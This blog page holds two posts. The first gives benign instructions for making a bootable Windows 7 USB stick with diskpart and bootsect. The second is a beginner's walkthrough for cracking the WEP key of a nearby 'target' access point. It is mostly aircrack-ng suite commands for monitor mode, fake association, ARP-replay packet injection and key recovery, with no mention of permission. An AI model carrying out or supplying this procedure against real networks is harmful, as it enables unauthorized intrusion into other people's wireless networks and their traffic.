security.crudtastic.com

So, I guess this isn’t really a security related post … but someone will find it useful I hope! Earlier today I wanted to upgrade my little notebook to the latest version of Windows 7 .. but of course most netbooks don’t have a DVD drive so you need to boot it off a USB stick.

You will need the following to create this bootable USB stick

• USB stick (4GB will do just fine)
• Vista or Windows 7 installation
• Windows 7 media (can be used with Vista as well)

So first of all we need to format the USB stick .. Insert the usual rubbish about it wiping everything on the drive and to back it all up etc etc (LAME). You do this by doing the following

1. Plug in your USB Flash Drive
2. Open a command prompt as administrator (Right click on Start > All Programs > Accessories > Command Prompt and select “Run as administrator”
3. Find the drive number of your USB Drive by typing the following into the Command Prompt window:
   diskpart
   list disk
   The number of your USB drive will listed. You’ll need this for the next step.  I’ll assume that the USB flash drive is disk 1.
4. Format the drive by typing the next instructions into the same window. Replace the number “1” with the number of your disk below.
   select disk 1
   clean
   create partition primary
   select partition 1
   active
   format fs=NTFS
   assign
   exit
   

When that is done you’ll have a formatted USB flash drive ready to be made bootable.

OK .. next we need to make the drive bootable .. this is pretty easy!

1. 1. go to your Windows 7 install directory (on the DVD).
   2. Change directory to the DVD’s boot directory where bootsect lives:
      d:
      cd d:\boot
   3. Use bootsect to set the USB as a bootable NTFS drive prepared for a Vista/7 image. I’m assuming that your USB flash drive has been labeled disk G:\ by the computer:
      bootsect /nt60 g:
   4. We’re done for this part

The final step (apart from actually runing the install) is to copy the contents of the Windows 7 DVD to the USB stick. You can use Windows explorer for this .. too easy huh?

Shove that USB stick into a netbook, power it up, make it boot from the USB stick and watch the magic of Windows 7 begin!!

That’s the basics .. if you have trouble with that you should see if there’s some video tutorials on youtube or something. Good luck team!

I know this has pretty much been done to death .. but for those of you who are just starting out (or just needing a real quick simple explination) here’s the methodology for you!

First of all you need a PC (I use an ASUS EEE PC – one of the early linux models) and of course BackTrack 3

OK .. now lets get down to business.

First of all boot into backtrack (I’m not going to explain this .. if you don’t understand drop me a comment or something and I’ll either clear it up in this post .. or I’ll make another post explaining it).

Open up a terminal window and start the wireless card in monitor mode. To do this type

airmon-ng start wifi0

You should notice the following displayed on the screen (or similar – this is all from my EEEPC)

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Type in the following
airodump-ng ath1

You’ll see a list of wireless access points in your area, their channel, and authentication type, BSSID, ESSID.

Write down or copy to a notepad the BSSID, ESSID and channel.

Open up a new terminal tab
enter the next command
airodump-ng -c channel –bssid BSSID -w filename ath1

BSSID – the access point MAC address.
filename – try and make it something that is easy to remember (usually the name of the AP)
Open another tab in the terminal. It’s time to make an association with the target access point.
Type in
aireplay-ng -1 0 -e SSID -a BSSID ath1

You should see the response, showing association is successful.
SSID – the wireless network name
BSSID – the access point MAC address
OUR MAC – our own wireless card’s MAC address

Open another tab in terminal (thank god for tabs huh)
Now we inject some packets. To do this type
aireplay-ng -3 -b BSSID ath1 -x 500

If there is someone active on the wireless network you should get alot of packets through pretty quickly. Usually you would wait until you have about 30000 – 40000 packets before moving on to the next step. Either way just let this command run while you’re doing the rest of the steps, if you find you don’t have enough data this will continue running and collecting.

Next, open yet another tab in terminal and type in the following (this will give you the WEP key)

aircrack-ng -b BSSID filename*.cap

The filename is the same on that you set in the earlier step (remember .. the one that is usually the same as the AP). Mine actually comes up as filename-01.cap .. just do an ls and find yours. After a little bit, aircrack will do its thing and you should get your WEP key. If not, keep on collecting data and try again!

One thing to note here: this will default to whatever channel you use when you put your wifi card in monitor mode at the start. If you find that the AP is on a different channel to the one you are using (after you do airodump-ng you should see the channel) go back and do an airmon-ng stop ath1 (or whatever device you have in monitor mode) to stop it, then do an airmon-ng start wifi0 <channel> (where <channel> is 6 or 11 or whatever) and follow the rest of the steps.

That’s all there really is to it

Big thanks to my original source of information – Kal El’s World